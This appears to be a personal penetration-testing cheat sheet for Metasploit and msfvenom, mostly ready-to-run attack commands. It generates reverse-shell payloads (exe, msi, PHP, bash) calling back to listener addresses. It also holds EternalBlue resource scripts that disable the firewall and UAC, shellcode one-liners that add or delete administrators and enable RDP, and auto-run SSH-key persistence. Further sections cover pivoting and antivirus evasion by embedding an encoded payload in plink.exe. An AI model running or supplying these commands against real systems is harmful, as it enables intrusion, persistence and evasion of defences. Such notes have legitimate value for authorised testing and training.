Metasploit
Docs: https://pentestwiki.org/msfvenom-payloads-cheat-sheet/ , https://book.hacktricks.xyz/generic-methodologies-and-resources/shells/msfvenom
Suggest local privilege-escalation exploits for an existing session (set SESSION first)
use post/multi/recon/local_exploit_suggester
List payloads
msfvenom -l payloads --platform windows --arch x64
Reverse listener
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
Oneliner reverse listener
msfconsole -q -x "use exploit/multi/handler; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST tun0; set LPORT 4445; exploit"
msfconsole -q -x "use exploit/multi/handler; set PAYLOAD linux/x86/meterpreter/reverse_tcp; set LHOST tun0; set LPORT 4445; exploit"
Service scanners: Redis (unauthenticated info) and MongoDB (login)
use auxiliary/scanner/redis/redis_server
use auxiliary/scanner/mongodb/mongodb_login
SMTP user enumeration (VRFY / EXPN / RCPT TO)
auxiliary/scanner/smtp/smtp_enum
Persistence: install a payload on the host that calls back every DELAY seconds (default 10); needs a SESSION
use exploit/windows/local/persistence
Kerberos user enumeration
use auxiliary/gather/kerberos_enumusers
LLMNR
auxiliary/spoof/llmnr/llmnr_response
Setup
Create and initialize the MSF database (starts PostgreSQL if it is not running)
sudo msfdb init
# make PostgreSQL start on boot and start it now
sudo systemctl enable --now postgresql
# check: inside msfconsole, db_status must report a PostgreSQL connection, otherwise hosts/services/creds are not stored
Resource script (.rc): commands inside <ruby> blocks run in msfconsole, run_single executes one console command
<ruby>
print_status("Backdoor user settings for 10.10.10.10")
run_single("use auxiliary/admin/smb/ms17_010_command")
run_single("set RHOSTS 10.10.10.10")
print_status("View backdoor user: share_admin")
run_single("set COMMAND 'net user share_admin'")
run_single("run")
</ruby>
<ruby>
print_status("Turn Windows Firewall OFF")
run_single("use auxiliary/admin/smb/ms17_010_command")
run_single("set RHOSTS 10.10.10.10")
# optional: credentials for the named pipe; leave both unset for an anonymous connection
# run_single("set SMBUser <user>")
# run_single("set SMBPass <password>")
print_status("Turn off firewall for all networks")
run_single('set COMMAND "netsh advfirewall set allprofiles state off"')
run_single("run")
print_status("Show current firewall profile")
run_single('set COMMAND "netsh advfirewall show currentprofile"')
run_single("run")
print_status("Disable UAC")
run_single('set COMMAND "reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f"')
run_single("run")
print_status("Give local accounts a full admin token over the network (LocalAccountTokenFilterPolicy=1, needed for psexec-style access)")
run_single('set COMMAND "reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\system /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f"')
run_single("run")
</ruby>
Run the script (through proxychains here; drop proxychains -q when not pivoting)
proxychains -q msfconsole -q -x "resource script.rc"
Pivot
https://pentest.blog/explore-hidden-networks-with-double-pivoting/
Add a route through the current meterpreter session (the autoroute script is deprecated; post/multi/manage/autoroute does the same)
run autoroute -s 7.7.7.0/24
List all routes
run autoroute -p
# equivalent from the msf prompt: route add 7.7.7.0 255.255.255.0 <session-id> and route print
Discover hosts on the pivoted subnet (ARP scan run from the compromised host)
run post/windows/gather/arp_scanner RHOSTS=7.7.7.0/24
MsfVenom
Docs: https://www.offensive-security.com/metasploit-unleashed/Msfvenom/ , https://thedarksource.com/msfvenom-cheat-sheet-create-metasploit-payloads/
List payloads
msfvenom -l payloads
List the encoders
msfvenom --list encoders
Generate an x64 reverse shell (stageless: the whole shell is in the exe, so a plain nc listener works)
msfvenom -a x64 --platform windows -p windows/x64/shell_reverse_tcp LHOST=$IP LPORT=443 -f exe -o reverse.exe
# Variation: staged (shell/reverse_tcp); the exe only fetches the second stage, so the listener must be exploit/multi/handler with the same payload
msfvenom -a x64 --platform windows -p windows/x64/shell/reverse_tcp LHOST=$IP LPORT=443 -f exe -o reverse.exe
# For x86, use the payload without x64 in its name (windows/shell_reverse_tcp) and drop -a x64; the architecture follows the payload
Other reverse shell payloads
# MSI package (run on the target with msiexec /quiet /i malicious.msi)
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.49.211 LPORT=<local-port> -f msi -o malicious.msi
# x86 meterpreter, 9 rounds of shikata_ga_nai
msfvenom -p windows/meterpreter/reverse_tcp -a x86 --encoder x86/shikata_ga_nai -i 9 LHOST=10.11.21.99 LPORT=4444 -f exe -o reverse_shell.exe
# same payload, no encoding
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.11.21.99 LPORT=4444 -f exe > revshell.exe
# PHP (plain shell, not meterpreter; drop it in the web root)
msfvenom -p php/reverse_php LHOST=10.8.28.34 LPORT=1234 -f raw > phpwindowsreverse.php
# bash one-liner
msfvenom -p cmd/unix/reverse_bash LHOST=192.168.49.196 LPORT=2222 -f raw > shell.sh
Windows one-liners for exploit development: -f py -v payload emits a Python variable named payload, -b lists the bad characters the encoder must avoid, EXITFUNC=thread keeps the host process alive after the command runs
Ping (proof of execution)
msfvenom -p windows/exec CMD='cmd.exe /k "ping -n 2 172.16.40.5"' EXITFUNC=thread -b "\x00\x0a" -f py -v payload -e x86/shikata_ga_nai
Turn off firewall for all networks
msfvenom -p windows/exec CMD='netsh advfirewall set allprofiles state off' EXITFUNC=thread -b "\x00\x0a" -f py -v payload -e x86/shikata_ga_nai
Delete user Cory
msfvenom -p windows/exec CMD='cmd.exe /k "net user cory /delete"' EXITFUNC=thread -b "\x00\x0a" -f py -v payload -e x86/shikata_ga_nai
Add Cory as a local administrator
msfvenom -p windows/exec CMD='cmd.exe /k "net user /add cory Wind0wz87!kj && net localgroup administrators cory /add"' EXITFUNC=thread -b "\x00\x0a" -f py -v payload -e x86/shikata_ga_nai
Enable remote desktop
msfvenom -p windows/exec CMD='cmd.exe /k reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f' EXITFUNC=thread -b "\x00\x0a" -f py -v payload -e x86/shikata_ga_nai
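The buffers above get pasted straight into a Python exploit, and -b only tells the encoder which bytes to avoid; it is still worth verifying the result before sending it. The following is an added example, not part of these notes: it parses the shape msfvenom emits for -f py -v payload, reports any listed bad character that survived, and goes one step beyond the notes by also building the all-bytes test string used to discover bad characters in the first place. SAMPLE_OUTPUT is constructed by hand (not real msfvenom output) with 0x0a and 0x00 planted on purpose; the function names are this example's own.

```python
"""Check a msfvenom "-f py -v payload" buffer for bad characters.

Added example for these notes, not msfvenom's own code. The sample below is
hand-constructed in msfvenom's Python output layout; it is not real shellcode.
"""
import re
from typing import List, Tuple

# one "\xNN" escape as printed by msfvenom (and as typed after -b)
HEX_ESCAPE = re.compile(r"\\x([0-9a-fA-F]{2})")

# Constructed sample in the layout of msfvenom ... -f py -v payload.
# Bytes 0x0a, 0x00, 0x00 are planted at offsets 5, 6 and 7 so the check has something to find.
SAMPLE_OUTPUT = r'''payload =  b""
payload += b"\xfc\x48\x83\xe4\xf0\x0a\x00\x00\x41\x51"
payload += b"\x41\x50\x52\x51\x56\x48\x31\xd2\x65\x48"
'''


def parse_msfvenom_py(text: str, var: str = "payload") -> bytes:
    """Rebuild the raw shellcode from msfvenom's Python (-f py) output.

    Only lines of the form `<var> =` / `<var> +=` are read, so banner lines or
    comments pasted along with the buffer are ignored. Old msfvenom versions
    print plain "" instead of b"", which the optional b covers.
    """
    prefix = re.compile(r"^\s*%s\s*\+?=\s*b?[\"']" % re.escape(var))
    out = bytearray()
    for line in text.splitlines():
        if prefix.match(line):
            out.extend(int(h, 16) for h in HEX_ESCAPE.findall(line))
    return bytes(out)


def parse_badchars(spec: str) -> bytes:
    """Turn the string given to msfvenom -b (e.g. "\\x00\\x0a") into bytes."""
    return bytes(int(h, 16) for h in HEX_ESCAPE.findall(spec))


def find_bad_chars(buf: bytes, badchars: bytes) -> List[Tuple[int, int]]:
    """Return (offset, value) for every byte of buf that is in badchars."""
    bad = set(badchars)
    return [(i, b) for i, b in enumerate(buf) if b in bad]


def badchar_test_string(exclude: bytes = b"\x00") -> bytes:
    """Every byte value except the ones already known to be bad.

    This is what you send to the target and compare against the memory dump
    to find the next bad character; each byte found is added to exclude and
    the round is repeated until the dump matches.
    """
    return bytes(b for b in range(256) if b not in exclude)


if __name__ == "__main__":
    spec = r"\x00\x0a"  # same text as msfvenom ... -b "\x00\x0a"
    shellcode = parse_msfvenom_py(SAMPLE_OUTPUT)
    hits = find_bad_chars(shellcode, parse_badchars(spec))
    print(f"{len(shellcode)} bytes parsed, {len(hits)} bad byte(s) found")
    for offset, value in hits:
        print(f"  offset {offset:#06x}: {value:#04x}")
```

Run it against the real msfvenom output by replacing SAMPLE_OUTPUT with the pasted buffer; a clean result is an empty list. A hit in an encoded payload means the -b list passed to msfvenom did not match the characters the target actually mangles, so rerun msfvenom with the corrected list rather than patching bytes by hand.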
Case: limited reverse shell (the session dies after about 3 s). Start several handlers with AutoRunScript so every short-lived session immediately installs an SSH key for persistence (post/linux/manage/sshkey_persistence). The shared options are set before the first run -j, because a backgrounded job copies the datastore when it is launched and ignores later set commands.
msfconsole -q -x "use exploit/multi/handler; set PAYLOAD linux/x64/meterpreter/reverse_tcp; set AutoRunScript post/linux/manage/sshkey_persistence; set SessionCommunicationTimeout 0; set ExitOnSession false; set LHOST 127.0.0.1; set LPORT 6000; run -j; set LPORT 6001; run -j; set LPORT 6002; run -j; set LPORT 6003; run -j; set LPORT 6004; run -j; set LPORT 6005; run -j; set LPORT 6006; run -j; set LPORT 6007; run -j; set LPORT 6008; run -j; set LPORT 6009; run -j; set LPORT 6010; run"
setup.rc: a resource script that sets the payload to windows/meterpreter/reverse_https with the relevant LHOST and LPORT, enables stage encoding with x86/shikata_ga_nai, and runs post/windows/manage/migrate automatically through AutoRunScript, so the spawned meterpreter launches a background notepad.exe and migrates into it. ExitOnSession is set to false so the listener keeps accepting new connections, and the module is run with -j (background job) and -z (do not interact with the session automatically).
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_https
set LHOST 10.11.0.4
set LPORT 443
set EnableStageEncoding true
set StageEncoder x86/shikata_ga_nai
set AutoRunScript post/windows/manage/migrate
set ExitOnSession false
exploit -j -z
Then we can run the script with
sudo msfconsole -r setup.rc
With the listener running, launch an executable containing a meterpreter payload from the Windows VM; build it with msfvenom:
msfvenom -p windows/meterpreter/reverse_https LHOST=10.11.0.4 LPORT=443 -f exe -o met.exe
When met.exe runs, multi/handler accepts the connection, the session is spawned with an encoded second stage, and AutoRunScript migrates it into a fresh notepad.exe process.
Antivirus (AV) evasion
Inject a payload into an existing PE file (-x template) and encode it with 9 iterations of shikata_ga_nai; add -k to keep the template's own behaviour and run the payload in a new thread. Expect current AV to flag the result anyway (the encoder and the stub are well known), so test it against a local copy of the target's AV first.
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.118.2 LPORT=443 -f exe -e x86/shikata_ga_nai -i 9 -x /usr/share/windows-resources/binaries/plink.exe -o shell_reverse_msf_encoded_embedded.exe
# Same command through msfconsole, after "use payload/windows/shell_reverse_tcp" and setting LHOST/LPORT
msf6 payload(windows/shell_reverse_tcp) > generate -f exe -e x86/shikata_ga_nai -i 9 -x /usr/share/windows-resources/binaries/plink.exe -o shell_reverse_msf_encoded_embedded.exe